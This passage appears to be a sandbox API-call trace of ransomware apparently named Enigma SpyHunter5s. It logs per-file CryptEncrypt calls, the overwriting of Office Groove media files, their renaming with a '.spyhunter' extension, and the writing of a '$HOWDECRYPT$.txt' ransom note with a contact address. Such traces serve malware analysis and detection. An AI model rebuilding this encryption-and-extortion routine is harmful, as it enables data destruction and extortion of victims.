(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0106.612] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fbf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fbf8*=0x2ac, lpOverlapped=0x0) returned 1 [0106.612] CloseHandle (hObject=0x16c) returned 1 [0106.612] GetProcessHeap () returned 0x2c0000 [0106.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c263f0 | out: hHeap=0x2c0000) returned 1 [0106.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb98 | out: pbBuffer=0x248fb98) returned 1 [0106.612] GetProcessHeap () returned 0x2c0000 [0106.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0106.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248fb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248fb90*=0x30) returned 1 [0106.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0106.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV") returned 77 [0106.614] StrStrW (lpFirst="RADAR.WAV", lpSrch=".txt") returned 0x0 [0106.615] GetProcessHeap () returned 0x2c0000 [0106.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0106.615] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fb54*=0x2800, lpOverlapped=0x0) returned 1 [0106.632] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.632] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fb54*=0x2800, lpOverlapped=0x0) returned 1 [0106.632] GetProcessHeap () returned 0x2c0000 [0106.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0106.632] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.632] WriteFile (in: hFile=0x158, lpBuffer=0x248fb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb54, lpOverlapped=0x0 | out: lpBuffer=0x248fb94*, lpNumberOfBytesWritten=0x248fb54*=0x4, lpOverlapped=0x0) returned 1 [0106.633] WriteFile (in: hFile=0x158, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248fb54*=0x30, lpOverlapped=0x0) returned 1 [0106.633] CloseHandle (hObject=0x158) returned 1 [0106.633] GetProcessHeap () returned 0x2c0000 [0106.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0106.633] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV.spyhunter") returned 87 [0106.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav.spyhunter")) returned 1 [0106.635] GetProcessHeap () returned 0x2c0000 [0106.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0106.635] GetProcessHeap () returned 0x2c0000 [0106.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0106.635] GetProcessHeap () returned 0x2c0000 [0106.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9eec0 | out: hHeap=0x2c0000) returned 1 [0106.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb90 | out: pbBuffer=0x248fb90) returned 1 [0106.635] GetProcessHeap () returned 0x2c0000 [0106.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0106.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248fb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248fb88*=0x30) returned 1 [0106.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0106.789] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV") returned 78 [0106.789] StrStrW (lpFirst="SPLASH.WAV", lpSrch=".txt") returned 0x0 [0106.789] GetProcessHeap () returned 0x2c0000 [0106.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0106.790] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248fb4c*=0x2800, lpOverlapped=0x0) returned 1 [0106.811] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.811] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248fb4c*=0x2800, lpOverlapped=0x0) returned 1 [0106.812] GetProcessHeap () returned 0x2c0000 [0106.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0106.812] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.812] WriteFile (in: hFile=0x154, lpBuffer=0x248fb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb4c, lpOverlapped=0x0 | out: lpBuffer=0x248fb8c*, lpNumberOfBytesWritten=0x248fb4c*=0x4, lpOverlapped=0x0) returned 1 [0106.831] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248fb4c*=0x30, lpOverlapped=0x0) returned 1 [0106.941] CloseHandle (hObject=0x154) returned 1 [0107.112] GetProcessHeap () returned 0x2c0000 [0107.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.113] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV.spyhunter") returned 88 [0107.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav.spyhunter")) returned 1 [0107.114] GetProcessHeap () returned 0x2c0000 [0107.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.114] GetProcessHeap () returned 0x2c0000 [0107.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0107.114] GetProcessHeap () returned 0x2c0000 [0107.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9f600 | out: hHeap=0x2c0000) returned 1 [0107.115] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.149] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0107.149] WriteFile (in: hFile=0x16c, lpBuffer=0x248fac3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x248fac3*, lpNumberOfBytesWritten=0x248fbec*=0x127, lpOverlapped=0x0) returned 1 [0107.152] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0107.152] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fbec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fbec*=0x2ac, lpOverlapped=0x0) returned 1 [0107.152] CloseHandle (hObject=0x16c) returned 1 [0107.152] GetProcessHeap () returned 0x2c0000 [0107.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cde790 | out: hHeap=0x2c0000) returned 1 [0107.152] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb88 | out: pbBuffer=0x248fb88) returned 1 [0107.152] GetProcessHeap () returned 0x2c0000 [0107.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0107.153] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb80*=0x30) returned 1 [0107.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.155] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp") returned 104 [0107.155] StrStrW (lpFirst="computericonMask.bmp", lpSrch=".txt") returned 0x0 [0107.155] GetProcessHeap () returned 0x2c0000 [0107.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.155] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb44*=0x838, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff7c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.157] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x838, lpNumberOfBytesWritten=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb44*=0x838, lpOverlapped=0x0) returned 1 [0107.157] GetProcessHeap () returned 0x2c0000 [0107.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.157] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x248fb84*, lpNumberOfBytesWritten=0x248fb44*=0x4, lpOverlapped=0x0) returned 1 [0107.158] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb44*=0x30, lpOverlapped=0x0) returned 1 [0107.158] CloseHandle (hObject=0x16c) returned 1 [0107.158] GetProcessHeap () returned 0x2c0000 [0107.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.158] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp.spyhunter") returned 114 [0107.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp.spyhunter")) returned 1 [0107.159] GetProcessHeap () returned 0x2c0000 [0107.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.159] GetProcessHeap () returned 0x2c0000 [0107.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0107.159] GetProcessHeap () returned 0x2c0000 [0107.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf2378 | out: hHeap=0x2c0000) returned 1 [0107.159] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb88 | out: pbBuffer=0x248fb88) returned 1 [0107.159] GetProcessHeap () returned 0x2c0000 [0107.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0107.159] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb80*=0x30) returned 1 [0107.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.170] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg") returned 100 [0107.170] StrStrW (lpFirst="computericon.jpg", lpSrch=".txt") returned 0x0 [0107.170] GetProcessHeap () returned 0x2c0000 [0107.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.171] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb44*=0xe1b, lpOverlapped=0x0) returned 1 [0107.200] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff1e5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.201] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe1b, lpNumberOfBytesWritten=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb44*=0xe1b, lpOverlapped=0x0) returned 1 [0107.201] GetProcessHeap () returned 0x2c0000 [0107.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0107.201] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.201] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x248fb84*, lpNumberOfBytesWritten=0x248fb44*=0x4, lpOverlapped=0x0) returned 1 [0107.201] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb44*=0x30, lpOverlapped=0x0) returned 1 [0107.202] CloseHandle (hObject=0x16c) returned 1 [0107.202] GetProcessHeap () returned 0x2c0000 [0107.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.202] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg.spyhunter") returned 110 [0107.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericon.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericon.jpg.spyhunter")) returned 1 [0107.203] GetProcessHeap () returned 0x2c0000 [0107.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.203] GetProcessHeap () returned 0x2c0000 [0107.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0107.203] GetProcessHeap () returned 0x2c0000 [0107.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cde678 | out: hHeap=0x2c0000) returned 1 [0107.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb80 | out: pbBuffer=0x248fb80) returned 1 [0107.203] GetProcessHeap () returned 0x2c0000 [0107.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0107.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb78*=0x30) returned 1 [0107.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.221] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp") returned 119 [0107.221] StrStrW (lpFirst="InactiveTabImageMask.bmp", lpSrch=".txt") returned 0x0 [0107.221] GetProcessHeap () returned 0x2c0000 [0107.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.221] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb3c*=0xca8, lpOverlapped=0x0) returned 1 [0107.241] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff358, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.241] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xca8, lpNumberOfBytesWritten=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb3c*=0xca8, lpOverlapped=0x0) returned 1 [0107.241] GetProcessHeap () returned 0x2c0000 [0107.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.241] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.241] WriteFile (in: hFile=0x178, lpBuffer=0x248fb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x248fb7c*, lpNumberOfBytesWritten=0x248fb3c*=0x4, lpOverlapped=0x0) returned 1 [0107.241] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb3c*=0x30, lpOverlapped=0x0) returned 1 [0107.242] CloseHandle (hObject=0x178) returned 1 [0107.242] GetProcessHeap () returned 0x2c0000 [0107.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.242] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp.spyhunter") returned 129 [0107.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimagemask.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImageMask.bmp.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimagemask.bmp.spyhunter")) returned 1 [0107.242] GetProcessHeap () returned 0x2c0000 [0107.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.243] GetProcessHeap () returned 0x2c0000 [0107.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0107.243] GetProcessHeap () returned 0x2c0000 [0107.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38ec70 | out: hHeap=0x2c0000) returned 1 [0107.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb80 | out: pbBuffer=0x248fb80) returned 1 [0107.243] GetProcessHeap () returned 0x2c0000 [0107.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0107.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb78*=0x30) returned 1 [0107.243] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 